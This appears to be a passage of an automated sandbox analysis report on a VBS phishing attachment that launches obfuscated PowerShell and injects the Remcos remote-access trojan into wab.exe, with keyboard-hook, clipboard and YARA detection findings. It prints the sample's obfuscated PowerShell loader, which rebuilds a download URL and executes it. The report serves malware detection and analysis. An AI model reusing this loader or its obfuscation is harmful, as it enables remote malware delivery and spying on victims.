                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: wab.exe, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://www.office.com/

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0041183A OpenClipboard,GetLastError,DeleteFileW,10_2_0041183A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,10_2_0040987A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004098E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_00406DFC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_00406E9F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004068B5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_004072B5

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_7372.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7372, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Very long command line found
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9233
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9233
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9233Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9233Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)SnaJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00401806 NtdllDefWindowProc_W,10_2_00401806
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004018C0 NtdllDefWindowProc_W,10_2_004018C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004016FD NtdllDefWindowProc_A,11_2_004016FD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004017B7 NtdllDefWindowProc_A,11_2_004017B7
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402CAC NtdllDefWindowProc_A,12_2_00402CAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402D66 NtdllDefWindowProc_A,12_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B88BEA21_2_00007FFD9B88BEA2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B88B0F61_2_00007FFD9B88B0F6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02A5F1F04_2_02A5F1F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02A5FAC04_2_02A5FAC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02A5EEA84_2_02A5EEA8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_2279B5C19_2_2279B5C1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_227A71949_2_227A7194
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044B04010_2_0044B040
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043610D10_2_0043610D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044731010_2_00447310
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044A49010_2_0044A490
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040755A10_2_0040755A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043C56010_2_0043C560
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044B61010_2_0044B610
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044D6C010_2_0044D6C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004476F010_2_004476F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044B87010_2_0044B870
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044081D10_2_0044081D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0041495710_2_00414957
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004079EE10_2_004079EE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00407AEB10_2_00407AEB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044AA8010_2_0044AA80
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00412AA910_2_00412AA9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404B7410_2_00404B74
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404B0310_2_00404B03
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044BBD810_2_0044BBD8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404BE510_2_00404BE5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404C7610_2_00404C76
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00415CFE10_2_00415CFE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00416D7210_2_00416D72
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00446D3010_2_00446D30
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00446D8B10_2_00446D8B
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00406E8F10_2_00406E8F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040503811_2_00405038
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041208C11_2_0041208C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004050A911_2_004050A9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040511A11_2_0040511A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043C13A11_2_0043C13A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004051AB11_2_004051AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044930011_2_00449300
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040D32211_2_0040D322
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044A4F011_2_0044A4F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043A5AB11_2_0043A5AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041363111_2_00413631
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044669011_2_00446690
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044A73011_2_0044A730
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004398D811_2_004398D8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004498E011_2_004498E0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044A88611_2_0044A886
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043DA0911_2_0043DA09
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00438D5E11_2_00438D5E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00449ED011_2_00449ED0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041FE8311_2_0041FE83
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00430F5411_2_00430F54
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004050C212_2_004050C2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004014AB12_2_004014AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040513312_2_00405133
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004051A412_2_004051A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040124612_2_00401246
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040CA4612_2_0040CA46
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040523512_2_00405235
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004032C812_2_004032C8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040168912_2_00401689
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402F6012_2_00402F60
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
                Source: STATEMENT OF ACCOUNT.vbsInitial sample: Strings found which are bigger than 50
                Source: amsi32_7372.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7372, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winVBS@26/15@1/3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,10_2_004182CE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,12_2_00410DE1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,10_2_00418758
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,10_2_00413D4C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,10_2_0040B58D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Fejdede.ellJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-LO8JHK
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asrbhln5.pt5.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5352
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7372
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: wab.exe, wab.exe, 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.2367050724.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
